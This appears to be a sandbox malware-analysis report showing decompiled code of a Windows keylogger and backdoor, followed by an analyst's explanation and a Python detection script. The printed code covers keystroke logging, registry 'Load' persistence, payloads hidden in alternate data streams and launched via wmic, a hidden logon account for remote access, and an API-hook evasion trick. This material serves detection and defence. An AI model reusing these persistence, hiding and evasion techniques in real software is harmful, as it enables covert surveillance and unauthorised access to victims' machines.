                                  				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
                                  				_t50 =  *0x42675c; // 0x0
                                  				CloseHandle( *(_t50 + 4));
                                  				return E00405FEB(_v8);
                                  			}

                                  0x004085cb
                                  0x004085de
                                  0x004085e9
                                  0x004085f1
                                  0x00408607
                                  0x0040860d
                                  0x0040860f
                                  0x0040865a
                                  0x00408611
                                  0x0040861b
                                  0x00408634
                                  0x00408640
                                  0x00408648
                                  0x0040864d
                                  0x0040864d
                                  0x0040865f
                                  0x00408670
                                  0x00408674
                                  0x00408679
                                  0x004086b4
                                  0x004086b7
                                  0x004086b7
                                  0x004086bd
                                  0x004086c3
                                  0x004086c8
                                  0x0040867b
                                  0x0040868d
                                  0x00408697
                                  0x0040869c
                                  0x004086a1
                                  0x004086a6
                                  0x00000000
                                  0x004086a8
                                  0x004086a8
                                  0x004086a8
                                  0x004086a6
                                  0x004086de
                                  0x004086e4
                                  0x004086f6
                                  0x004086f9
                                  0x004086fd
                                  0x00408700
                                  0x00408707
                                  0x0040870a
                                  0x00408713
                                  0x00408715
                                  0x00408726
                                  0x0040872e
                                  0x00408737
                                  0x00408739
                                  0x0040873e
                                  0x0040874a
                                  0x0040874d
                                  0x00408756
                                  0x00408758
                                  0x00408758
                                  0x0040875e
                                  0x00408761
                                  0x00408768
                                  0x0040876d
                                  0x00408776
                                  0x00408778
                                  0x00408780
                                  0x00408792

                                  APIs
                                  • GetForegroundWindow.USER32 ref: 004085F4
                                  • GetWindowTextW.USER32 ref: 00408607
                                  • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                  • lstrcpyW.KERNEL32(-00000210,?), ref: 004086BD
                                  • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 004086DE
                                  • lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                  • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                  • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000), ref: 00408737
                                  • lstrlenW.KERNEL32(00417A60,-00000008,00000000,?,?), ref: 0040874A
                                  • WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408756
                                  • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00408768
                                  • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00408776
                                  • CloseHandle.KERNEL32(?), ref: 00408780
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                  • String ID: {Unknown}
                                  • API String ID: 2314120260-4054869793
                                  • Opcode ID: 7c00ab8ebeb36043a8b51ae596ee7ad1a8c4eacac02618ea8ae42d8705234516
                                  • Instruction ID: 21f225d70ee6afc1dcb4dd19440159f35fb949404d55de6ac3cc6466c0fc773e
                                  • Opcode Fuzzy Hash: 7c00ab8ebeb36043a8b51ae596ee7ad1a8c4eacac02618ea8ae42d8705234516
                                  • Instruction Fuzzy Hash: EF515F71A40208AFC710EB55DC89FDE7BB9EF44348F0580BAB905A72A1DB759E41CB5C

                                  C-Code - Quality: 96%
                                  			E004126DC(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, char* _a8, void* _a12) {
                                  				void* _v12;
                                  				WCHAR* _v16;
                                  				WCHAR* _v20;
                                  				intOrPtr* _v24;
                                  				WCHAR* _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				void* _t90;
                                  				intOrPtr* _t112;
                                  				intOrPtr* _t130;
                                  				intOrPtr* _t132;
                                  				intOrPtr* _t145;
                                  				intOrPtr* _t147;
                                  				int _t152;
                                  				int _t179;
                                  				char* _t185;
                                  				WCHAR* _t192;
                                  				intOrPtr _t228;
                                  				intOrPtr* _t254;
                                  				CHAR* _t255;
                                  				void* _t261;
                                  				WCHAR* _t263;
                                  				WCHAR** _t264;
                                  				char** _t265;
                                  				void* _t268;
                                  
                                  				_t268 = __eflags;
                                  				_t254 = __ecx;
                                  				_v24 = __ecx;
                                  				E004109A0();
                                  				_t250 = 0xa;
                                  				_t185 =  &_v44;
                                  				E004035B9(_t185, _t250, _t268);
                                  				_push(_t185);
                                  				_push(_t185);
                                  				_t90 = E00412514(__ecx, _t185, __ecx + 0x10);
                                  				E00412554(__ecx);
                                  				_t179 = 0;
                                  				if(_t90 == 0) {
                                  					L4:
                                  					_t259 = _t254 + 0x10;
                                  					goto L5;
                                  				} else {
                                  					_t270 = _a4;
                                  					if(_a4 == 0) {
                                  						goto L4;
                                  					} else {
                                  						_t250 =  *((intOrPtr*)(__ecx + 0xc));
                                  						_t264 = __ecx + 0x20;
                                  						E00403549(_t264, E00410C8A( &_v28,  *((intOrPtr*)(__ecx + 0xc)), _t270));
                                  						E00410C3E(E00405FEB(_v28), _t264);
                                  						E0040373F( &_v16, _t254 + 0x4c);
                                  						E00403447(E0040357C(_t264, _t250, _t270, "\\"), _t270,  &_v16);
                                  						_t243 = _v16;
                                  						E00405FEB(_v16);
                                  						if(CopyFileW(_v20,  *_t264, 0) != 0) {
                                  							E00403333(_t264, _t250, _t265);
                                  							E00405A61(_t254 + 0x30, _t250, _t265);
                                  							E004061F0( &_v40, _t250, _t264, _t264, _t243, _t243);
                                  							_t265 =  &(_t265[4]);
                                  							_t259 = _t254 + 0x10;
                                  							E00412612(_t254, 0x80000001, _t254 + 0x10, 0xf003f, 0);
                                  							E004125DF(_t254, _t254 + 0x18,  &_v40, 3);
                                  							E00403148( &_v40);
                                  							L5:
                                  							if( *_t254 == _t179) {
                                  								E00412612(_t254, 0x80000001, _t259, 0xf003f, _t179);
                                  							}
                                  							_t273 = _a12 - _t179;
                                  							if(_a12 == _t179) {
                                  								L11:
                                  								__eflags = _a8;
                                  								if(__eflags != 0) {
                                  									__eflags = _a4;
                                  									_t260 = _t254 + 0x20;
                                  									_a12 = _t254 + 0x20;
                                  									if(_a4 == 0) {
                                  										E00403549(_t260,  &_v20);
                                  									}
                                  									E00403666(_t260,  &_a4);
                                  									E00405FEB(_a4);
                                  									_t255 = E00401085(0x200);
                                  									E0040102C(_t255, "cmd.exe /c REG ADD \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /f /v Load /t REG_SZ /d \"", 0x68);
                                  									_t261 = E00401133( *((intOrPtr*)(E00403666(_t260,  &_a4))));
                                  									E00405FEB(_a4);
                                  									_t112 = E00403666(_a12,  &_a4);
                                  									_t74 =  &(_t255[0x68]); // 0x68
                                  									E0040102C(_t74,  *_t112, _t261);
                                  									E00405FEB(_a4);
                                  									_t76 =  &(_t255[0x68]); // 0x68
                                  									__eflags =  &(_t76[_t261]);
                                  									E0040102C( &(_t76[_t261]), "\"", 2);
                                  									WinExec(_t255, _t179);
                                  								}
                                  								E004036F7( &_a4,  *((intOrPtr*)(_v24 + 0x20)));
                                  								E00403447( &_a4, __eflags, E004036F7( &_a12, L":Zone.Identifier"));
                                  								E00405FEB(_a12);
                                  								DeleteFileW(_a4);
                                  								_t192 = _a4;
                                  								_t179 = 1;
                                  								__eflags = 1;
                                  							} else {
                                  								__imp__SHGetKnownFolderPath(_t179, _t179,  &_v32);
                                  								E004036F7( &_v16, _v32);
                                  								E0040357C( &_v16, _t250, _t273, L"\\programs.bat");
                                  								E004036F7( &_v12, L"for /F \"usebackq tokens=*\" %%A in (\"");
                                  								E0040357C(E0040357C(E0040357C( &_v12, _t250, _t273, _v16), _t250, _t273, L":start"), _t250, _t273, L"\") do %%A");
                                  								_t130 = E00403666( &_v12,  &_v36);
                                  								_t132 = E00403666( &_v16,  &_v28);
                                  								E004133B6( *_t132,  *_t130, E00403373( &_v12));
                                  								E00405FEB(_v28);
                                  								E00405FEB(_v36);
                                  								E00410C8A( &_v28,  *((intOrPtr*)(_v24 + 0xc)), _t273);
                                  								 *_t265 = L":ApplicationData";
                                  								E0040357C( &_v28,  *((intOrPtr*)(_v24 + 0xc)), _t273,  &E00417570);
                                  								E004036F7( &_a12, L"wmic process call create \'\"");
                                  								_t263 = _v28;
                                  								E0040357C(E0040357C( &_a12,  *((intOrPtr*)(_v24 + 0xc)), _t273, _t263),  *((intOrPtr*)(_v24 + 0xc)), _t273, L"\"\'");
                                  								E0040357C( &_v16,  *((intOrPtr*)(_v24 + 0xc)), _t273, L":start");
                                  								_t145 = E00403666( &_a12,  &_v28);
                                  								_t147 = E00403666( &_v16,  &_v36);
                                  								E004133B6( *_t147,  *_t145, E00403373( &_a12));
                                  								E00405FEB(_v36);
                                  								E00405FEB(_v28);
                                  								_t179 = 0;
                                  								_t152 = CopyFileW(_v20, _t263, 0);
                                  								_t228 = _a12;
                                  								if(_t152 != 0) {
                                  									E00405FEB(_t228);
                                  									_a12 = 0;
                                  									E00405FEB(_t263);
                                  									E00405FEB(_v12);
                                  									_v12 = 0;
                                  									E00405FEB(_v16);
                                  									_t254 = _v24;
                                  									goto L11;
                                  								} else {
                                  									E00405FEB(_t228);
                                  									_a12 = 0;
                                  									E00405FEB(_t263);
                                  									E00405FEB(_v12);
                                  									_t192 = _v16;
                                  									_v12 = 0;
                                  								}
                                  							}
                                  							E00405FEB(_t192);
                                  						}
                                  					}
                                  				}
                                  				E00405FEB(_v44);
                                  				E00405FEB(_v20);
                                  				return _t179;
                                  			}
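Read together, the three listings above give a defender the observable side of the sample's keylogger and persistence. The function at 0x00407f94 builds a log path from SHGetFolderPathW with CSIDL 0x1c (CSIDL_LOCAL_APPDATA) plus "\Microsoft Vision\" and a wsprintfW("%02d-%02d-%02d_%02d.%02d.%02d", day, month, year, hour, minute, second) name, creates it with CREATE_ALWAYS, then reads c:\windows\system32\user32.dll from disk into VirtualAlloc(..., 0x3000, 0x40) memory (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) and resolves SetWindowsHookExA from that private copy before installing hook type 0xd (WH_KEYBOARD_LL); a userland API hook on the normally loaded user32.dll may therefore never see the call, so the file and command-line artifacts are the more reliable telemetry. E004085CB reopens the same file with FILE_APPEND_DATA (4) and OPEN_ALWAYS (4) and appends the "{window title}" line and the captured text. E004126DC persists either with cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load ..., or by copying the payload into a "<path>:ApplicationData" alternate data stream, writing a programs.bat whose ":start" stream holds a wmic process call create '"<path>:ApplicationData"' line that the batch file reads back with for /F "usebackq ...", and then deleting the copy's :Zone.Identifier stream. The Python below is an added example, not part of this report and not the sample's code: it applies those indicators to constructed Sysmon-style process-creation (Event ID 1) and file-creation (Event ID 11) records. The user name "alice", the file name "payload.exe" and all event records are made up. The ADS check is generalised to any file:stream target rather than only the two stream names seen here, and the keylog-name match is anchored on the directory and the "_HH.MM.SS" tail because the decompiler's stack-offset labelling (wsprintfW into _v204.pt, lstrcatW from _v176) leaves the exact leading characters of the name uncertain.

```python
import re

# Keylog file (0x00407f94 / E004085CB): %LOCALAPPDATA%\Microsoft Vision\ plus a
# wsprintfW("%02d-%02d-%02d_%02d.%02d.%02d", day, month, year, hour, minute, second) name.
# %02d is a minimum width, so the year keeps four digits. Only the directory and the
# "_HH.MM.SS" tail are matched (see the lead-in for why the leading part is not).
KEYLOG_FILE = re.compile(
    r"\\AppData\\Local\\Microsoft Vision\\[\d-]*_\d{2}\.\d{2}\.\d{2}$", re.IGNORECASE)

# E004126DC, first branch: cmd.exe /c REG ADD "HKCU\...\CurrentVersion\Windows" /f /v Load ...
LOAD_VALUE = re.compile(
    r'\breg(?:\.exe)?\s+add\s+"?HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows"?'
    r"\s.*?/v\s+Load\b", re.IGNORECASE)

# E004126DC, second branch: payload copied into "<path>:ApplicationData" and started by
# wmic process call create '"<path>:ApplicationData"', which programs.bat reads from its own
# ":start" stream with for /F "usebackq ...". Generalised to any <file>.<ext>:<stream> target.
ADS_PATH = r"[^\"']+?\.[A-Za-z0-9]{1,5}:[A-Za-z0-9_$]+"
WMIC_ADS = re.compile(r"\bwmic\b.*?\bprocess\s+call\s+create\b.*?" + ADS_PATH, re.IGNORECASE)
FOR_ADS = re.compile(
    r'\bfor\s+/F\s+"usebackq[^"]*".*?\(\s*"' + ADS_PATH + r'"\s*\)', re.IGNORECASE)


def classify(event):
    """Return the indicator names a single Sysmon-style event record matches."""
    hits = []
    if event.get("EventID") == 1:                      # process creation
        cmd = event.get("CommandLine", "")
        if LOAD_VALUE.search(cmd):
            hits.append("autostart_load_value")
        if WMIC_ADS.search(cmd) or FOR_ADS.search(cmd):
            hits.append("ads_payload_launch")
    elif event.get("EventID") == 11:                   # file creation
        if KEYLOG_FILE.search(event.get("TargetFilename", "")):
            hits.append("keylog_file_created")
    return hits


def scan(events):
    """Group events by the indicator they triggered; events with no hit are dropped."""
    findings = {}
    for ev in events:
        for tag in classify(ev):
            findings.setdefault(tag, []).append(ev)
    return findings


# Constructed sample telemetry (not from the sandbox run). "alice" and "payload.exe" are
# placeholders; the command lines follow the strings in the decompiled code above.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c REG ADD "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion'
                    '\\Windows" /f /v Load /t REG_SZ /d "C:\\Users\\alice\\AppData\\Roaming\\payload.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic process call create '\"C:\\Users\\alice\\AppData\\Roaming\\programs.bat:ApplicationData\"'"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c for /F "usebackq tokens=*" %A in '
                    '("C:\\Users\\alice\\AppData\\Roaming\\programs.bat:start") do %A'},
    {"EventID": 11, "Image": r"C:\Users\alice\AppData\Roaming\payload.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Microsoft Vision\16-07-2021_14.05.33"},
    # Look-alikes that must stay quiet: same key but another value, a plain wmic launch,
    # an Office log file under the same profile.
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": 'reg add "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows"'
                    ' /v DeviceNotSelectedTimeout /t REG_SZ /d 15 /f'},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic process call create "C:\\Windows\\System32\\notepad.exe"'},
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\root\Office16\VISIO.EXE",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Microsoft\Office\16.0\Visio.log"},
]

if __name__ == "__main__":
    for tag, evs in sorted(scan(SAMPLE_EVENTS).items()):
        for ev in evs:
            print(f"[{tag}] {ev.get('CommandLine') or ev.get('TargetFilename')}")
```

On a live host the same three indicators can be checked directly instead of from logs: the Load value under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows, the contents of %LOCALAPPDATA%\Microsoft Vision\, and alternate data streams on any programs.bat in user profile folders (PowerShell's Get-Item -Stream * lists them). Because the file is created once with CREATE_ALWAYS and afterwards only reopened for append, a single Sysmon Event ID 11 for that path is expected even though the log keeps growing.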

                                  0x004126dc
                                  0x004126e5
                                  0x004126ea
                                  0x004126ed
                                  0x004126f4
                                  0x004126f5
                                  0x004126f8
                                  0x004126fd
                                  0x004126fe
                                  0x00412706
                                  0x0041270f
                                  0x00412714
                                  0x00412718
                                  0x004127dc
                                  0x004127dc
                                  0x00000000
                                  0x0041271e
                                  0x0041271e
                                  0x00412721
                                  0x00000000
                                  0x00412727
                                  0x00412727
                                  0x0041272d
                                  0x00412738
                                  0x00412747
                                  0x00412753
                                  0x0041276a
                                  0x0041276f
                                  0x00412772
                                  0x00412785
                                  0x00412790
                                  0x0041279b
                                  0x004127a3
                                  0x004127a8
                                  0x004127ab
                                  0x004127bc
                                  0x004127cd
                                  0x004127d5
                                  0x004127df
                                  0x004127e1
                                  0x004127f1
                                  0x004127f1
                                  0x004127f6
                                  0x004127f9
                                  0x0041297c
                                  0x0041297c
                                  0x00412980
                                  0x00412986
                                  0x0041298a
                                  0x0041298d
                                  0x00412990
                                  0x00412998
                                  0x00412998
                                  0x004129a3
                                  0x004129ab
                                  0x004129bc
                                  0x004129c4
                                  0x004129e2
                                  0x004129e4
                                  0x004129f0
                                  0x004129f8
                                  0x004129fc
                                  0x00412a04
                                  0x00412a0b
                                  0x00412a0e
                                  0x00412a16
                                  0x00412a20
                                  0x00412a20
                                  0x00412a2f
                                  0x00412a45
                                  0x00412a4d
                                  0x00412a55
                                  0x00412a5b
                                  0x00412a60
                                  0x00412a60
                                  0x004127ff
                                  0x0041280a
                                  0x00412816
                                  0x00412823
                                  0x00412830
                                  0x00412854
                                  0x00412860
                                  0x0041286e
                                  0x00412882
                                  0x0041288a
                                  0x00412892
                                  0x004128a0
                                  0x004128a8
                                  0x004128af
                                  0x004128bc
                                  0x004128c1
                                  0x004128d4
                                  0x004128dd
                                  0x004128e9
                                  0x004128f7
                                  0x0041290b
                                  0x00412914
                                  0x0041291c
                                  0x00412921
                                  0x00412928
                                  0x0041292e
                                  0x00412933
                                  0x00412957
                                  0x0041295e
                                  0x00412961
                                  0x00412969
                                  0x00412971
                                  0x00412974
                                  0x00412979
                                  0x00000000
                                  0x00412935
                                  0x00412935
                                  0x0041293c
                                  0x0041293f
                                  0x00412947
                                  0x0041294c
                                  0x0041294f
                                  0x0041294f
                                  0x00412933
                                  0x00412a61
                                  0x00412a61
                                  0x00412785
                                  0x00412721
                                  0x00412a69
                                  0x00412a71
                                  0x00412a7c

                                  APIs
                                    • Part of subcall function 004109A0: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                    • Part of subcall function 00412514: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,74A313FB,?,?,0041270B,?,?), ref: 00412534
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0041277D
                                    • Part of subcall function 00412612: RegCreateKeyExW.ADVAPI32(74A313FB,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                    • Part of subcall function 00412612: RegOpenKeyExW.ADVAPI32(74A313FB,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                    • Part of subcall function 004125DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                  • SHGetKnownFolderPath.SHELL32(00417570,00000000,00000000,?), ref: 0041280A
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00412928
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00410C3E: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 00410C44
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                  • WinExec.KERNEL32 ref: 00412A20
                                  • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,74A313FB,00000000), ref: 00412A55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryExecFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                  • String ID: ") do %%A$:ApplicationData$:Zone.Identifier$:start$\programs.bat$cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
                                  • API String ID: 1503101065-3574166584
                                  • Opcode ID: 03330eeec4e78cbb5b4aac335cdce81a29988cf68eee8f76144b90fca8fe9da0
                                  • Instruction ID: 79257a46d42963d1d04969a5855fdaa00e68833498fbabbc424ca4f910327048
                                  • Opcode Fuzzy Hash: 03330eeec4e78cbb5b4aac335cdce81a29988cf68eee8f76144b90fca8fe9da0
                                  • Instruction Fuzzy Hash: 1FA12F71A0050AABCB14EF61CC92DEE7B79EF44348B00442EF502772D2DF78AA55CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040E29A(void* __edx, char _a4, char _a8) {
                                  				void* _v12;
                                  				char _v16;
                                  				int _v20;
                                  				char _v36;
                                  				void _v44;
                                  				void* _t51;
                                  				int _t56;
                                  				int _t70;
                                  				void* _t104;
                                  				signed int _t115;
                                  				void* _t161;
                                  				void* _t162;
                                  				void* _t163;
                                  				int _t172;
                                  
                                  				_t161 = __edx;
                                  				InitializeCriticalSection( &_v44);
                                  				_t115 = 6;
                                  				DeleteCriticalSection(memcpy(0x55ad18,  &_v44, _t115 << 2));
                                  				EnterCriticalSection(0x55ad18);
                                  				_t167 = _a4;
                                  				_t111 = _a8;
                                  				 *0x55ad7c = _a4;
                                  				 *0x55ad70 = 0x559cc0;
                                  				 *0x55ad6c = _a8;
                                  				if(E0040DCBF(_t161) == 0) {
                                  					_t51 = E00410A3C();
                                  					__eflags = _t51 - 6;
                                  					if(_t51 < 6) {
                                  						L14:
                                  						E00405044(_t167, E00404C5E( &_v36, 2, 0x55ad74, 0x55ad78));
                                  						E00404C3B( &_v36);
                                  						LeaveCriticalSection(0x55ad18);
                                  						__eflags = 0;
                                  						return 0;
                                  					}
                                  					_t56 = E004109ED();
                                  					__eflags = _t56;
                                  					if(_t56 != 0) {
                                  						goto L14;
                                  					}
                                  					__eflags = E0041111B() - 1;
                                  					if(__eflags == 0) {
                                  						_t162 = 8;
                                  						E00403549(0x55ad74, E004035B9( &_a4, _t162, __eflags));
                                  						E00405FEB(_a4);
                                  						_t163 = 8;
                                  						E00403549(0x55ad78, E004035B9( &_a4, _t163, __eflags));
                                  						E00405FEB(_a4);
                                  						_t172 = 0;
                                  						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20); // HKEY_LOCAL_MACHINE, KEY_ALL_ACCESS | KEY_WOW64_64KEY
                                  						_v16 = 0;
                                  						RegSetValueExW(_v12,  *0x55ad74, 0, 4,  &_v16, 4); // value named by the string at 0x55ad74, REG_DWORD (4) = 0: hides that account from the logon UI
                                  						RegCloseKey(_v12);
                                  						_t70 = E0040D2B8(0x55ad74, 0x55ad78);
                                  						__eflags = _t70;
                                  						if(_t70 != 0) {
                                  							E00412C34(_a8, _t163, E004036F7( &_a4, L"rudp"), 0x55ad74);
                                  							E00405FEB(_a4);
                                  							E00412C34(_a8, _t163, E004036F7( &_a8, L"rpdp"), 0x55ad78);
                                  							E00405FEB(_a8);
                                  							E00401F6D(0x55ad30, E0040E187, 0x55ad18);
                                  							LeaveCriticalSection(0x55ad18);
                                  							return 1;
                                  						}
                                  						E00405044(_t167, E00404C5E( &_v36, 9, 0x55ad74, 0x55ad78));
                                  						E00404C3B( &_v36);
                                  						L12:
                                  						LeaveCriticalSection(0x55ad18);
                                  						return _t172;
                                  					}
                                  					E00405044(_t167, E00404C5E( &_v36, 1, 0x55ad74, 0x55ad78));
                                  					E00404C3B( &_v36);
                                  					_t172 = 0;
                                  					goto L12;
                                  				}
                                  				E00403549(0x55ad74, E00412C67(_t111, _t161,  &_a8, E004036F7( &_a4, L"rudp")));
                                  				E00405FEB(_a8);
                                  				_a8 = 0;
                                  				E00405FEB(_a4);
                                  				E00403549(0x55ad78, E00412C67(_t111, _t161,  &_a8, E004036F7( &_a4, L"rpdp")));
                                  				E00405FEB(_a8);
                                  				_a8 = 0;
                                  				E00405FEB(_a4);
                                  				if(E00403373(0x55ad74) != 0 || E00403373(0x55ad78) != 0) {
                                  					E00405044(_t167, E00404C5E( &_v36, 8, 0x55ad74, 0x55ad78));
                                  					E00404C3B( &_v36);
                                  				} else {
                                  					_t104 = E004036F7( &_a4, 0x417668);
                                  					E00405044(_t167, E00404C5E( &_v36, 8, E004036F7( &_a8, 0x417668), _t104));
                                  					E00404C3B( &_v36);
                                  					E00405FEB(_a8);
                                  					_a8 = 0;
                                  					E00405FEB(_a4);
                                  				}
                                  				_t172 = 1;
                                  				goto L12;
                                  			}


                                  0x0040e29a
                                  0x0040e2a7
                                  0x0040e2af
                                  0x0040e2be
                                  0x0040e2ca
                                  0x0040e2d0
                                  0x0040e2d3
                                  0x0040e2d6
                                  0x0040e2dc
                                  0x0040e2e6
                                  0x0040e2f3
                                  0x0040e3f4
                                  0x0040e3f9
                                  0x0040e3fc
                                  0x0040e56f
                                  0x0040e586
                                  0x0040e58e
                                  0x0040e594
                                  0x0040e59a
                                  0x00000000
                                  0x0040e59a
                                  0x0040e402
                                  0x0040e407
                                  0x0040e409
                                  0x00000000
                                  0x00000000
                                  0x0040e414
                                  0x0040e417
                                  0x0040e446
                                  0x0040e455
                                  0x0040e45d
                                  0x0040e464
                                  0x0040e475
                                  0x0040e47d
                                  0x0040e485
                                  0x0040e49f
                                  0x0040e4aa
                                  0x0040e4ba
                                  0x0040e4c3
                                  0x0040e4cf
                                  0x0040e4d4
                                  0x0040e4d6
                                  0x0040e523
                                  0x0040e52b
                                  0x0040e541
                                  0x0040e549
                                  0x0040e55e
                                  0x0040e564
                                  0x00000000
                                  0x0040e56c
                                  0x0040e4eb
                                  0x0040e4f3
                                  0x0040e4f8
                                  0x0040e4fe
                                  0x00000000
                                  0x0040e504
                                  0x0040e430
                                  0x0040e438
                                  0x0040e43d
                                  0x00000000
                                  0x0040e43d
                                  0x0040e318
                                  0x0040e320
                                  0x0040e32a
                                  0x0040e32d
                                  0x0040e353
                                  0x0040e35b
                                  0x0040e363
                                  0x0040e366
                                  0x0040e377
                                  0x0040e3df
                                  0x0040e3e7
                                  0x0040e384
                                  0x0040e38d
                                  0x0040e3aa
                                  0x0040e3b2
                                  0x0040e3ba
                                  0x0040e3c2
                                  0x0040e3c5
                                  0x0040e3c5
                                  0x0040e3ee
                                  0x00000000

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040E2A7
                                  • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040E2BE
                                  • EnterCriticalSection.KERNEL32(0055AD18,?,?), ref: 0040E2CA
                                    • Part of subcall function 0040DCBF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                  • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 0040E49F
                                  • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 0040E4BA
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 0040E4C3
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,0055AD74,0055AD78,?,?), ref: 0040E4FE
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,rpdp,0055AD78,00000000,rudp,0055AD74,0055AD74,0055AD78,?,?), ref: 0040E564
                                  • LeaveCriticalSection.KERNEL32(0055AD18,00000000,?,?), ref: 0040E594
                                  Strings
                                  Memory Dump Source
